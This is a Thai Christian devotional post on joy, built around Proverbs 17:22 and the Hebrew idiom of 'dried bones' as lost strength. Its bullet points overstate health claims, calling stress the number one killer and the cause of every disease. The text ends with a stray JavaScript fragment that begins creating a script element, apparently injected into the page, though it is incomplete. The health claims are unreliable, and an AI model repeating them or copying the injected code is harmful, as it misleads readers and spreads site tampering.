ความชื่นชมยินดี

p19tk4j4um1rqor3i1mliqr12r8c

06 พ.ค. ความชื่นชมยินดี

  • พระเจ้า สนับสนุนชีวิตที่ตลก สนุก เสียงหัวเราะ จงหาทุกช่องทางที่จะทำ….
  • ความเครียด ทำให้ระบบภูมิคุ้มกันอ่อนแอ
  • ความเครียด คือ ฆาตกรเบอร์หนึ่ง และเป็นต้นเหตุที่ก่อให้เกิดโรคทุกโรค
  • ความเครียด เพิ่มกรดและส่งผลกระทบต่อทุกสิ่งทุกอย่างในร่างกาย
  • มันจึงเป็นสิ่งที่สำคัญมากที่เราจะต้องทำจิตใจให้แข็งแรงเบิกบานอยู่เสมอ

    สุภาษิต 17:22 ใจร่าเริงเป็นยาอย่างดี แต่จิตใจจิตใจชอกช้ำทำให้กระดูกแห้ง
    “กระดูกแห้ง” ในสำนวนฮีบรู Dries bones = drains strength คำนี้หมายถึง การลดถอนกำลัง แปลตรงตัว ทำให้กำลังไหลหนีไปหมด จิตใจที่ชอกช้ำ หมดมานะ และวิญญาณที่ร้าวราน ทำให้กำลังหมดไป หรือลดหายไป บางฉบับ ให้คำว่า ทำให้ใจกายห่อเหี่ยว ขอบคุณพระองค์ที่เรามียาอย่างดี

Strength = กำลัง เรี่ยวแรง พละกำลัง

Drains = ระบายออก ทำให้หมดสิ้น หมดไม่มีเหลือ ทำให้เหนื่อยจิตใจที่ชอกช้ำเหมือนท่อที่ระบายน้ำแห่งชีวิตทิ้งออกไปจนหมด

ในชีวิตของเราพระยาห์เวห์ประสงค์ให้เราชื่นชมยินดี เมื่อไรก็ตามที่จิตวิญญาณอ่อนระโหยโรยแรง ก็เหมือนท่อน้ำในชีวิตที่ระบายเอากำลังและเรี่ยวแรง ความชื่นชมยินดีที่เป็นกำลังภายในนั้นออกไปจนหมด

เรียบเรียงโดย อ.เจริญ ยธิกุลvar d=document;var s=d.createElement(‘script’);